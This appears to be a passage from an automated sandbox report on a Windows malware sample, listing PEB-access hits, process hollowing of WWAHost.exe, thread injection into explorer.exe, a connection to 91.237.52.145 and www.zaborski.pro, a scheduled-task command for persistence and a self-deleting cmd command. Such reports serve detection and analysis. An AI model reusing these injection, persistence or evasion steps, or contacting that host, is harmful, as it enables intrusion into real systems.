          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 15_2_03C5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Code function: 7_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 91.237.52.145 80
          Source: C:\Windows\explorer.exe; Domain query: www.zaborski.pro
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1190000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\WWAHost.exe; Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Process created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
          Source: C:\Windows\SysWOW64\WWAHost.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: explorer.exe, 00000008.00000000.704466857.0000000000AD8000.00000004.00000020.sdmp; Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.756187684.000000000A716000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Users\user\Desktop\456yqMyHvT.exe VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
